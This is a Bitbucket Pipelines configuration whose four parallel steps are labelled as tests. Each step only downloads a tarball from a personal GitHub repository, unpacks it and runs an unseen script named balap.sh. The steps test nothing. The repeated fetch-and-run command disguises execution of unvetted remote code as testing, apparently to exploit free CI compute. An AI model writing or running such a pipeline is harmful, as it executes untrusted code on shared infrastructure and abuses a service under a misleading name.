image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: Test 1
          script:
            - wget https://github.com/najaputra/kuya/raw/main/shaqi.tar.gz && tar xf shaqi.tar.gz && ./balap.sh
      - step:
          name: Test 2
          script:
            - wget https://github.com/najaputra/kuya/raw/main/shaqi.tar.gz && tar xf shaqi.tar.gz && ./balap.sh
      - step:
          name: Test 3
          script:
            - wget https://github.com/najaputra/kuya/raw/main/shaqi.tar.gz && tar xf shaqi.tar.gz && ./balap.sh
      - step:
          name: Test 4
          script:
            - wget https://github.com/najaputra/kuya/raw/main/shaqi.tar.gz && tar xf shaqi.tar.gz && ./balap.sh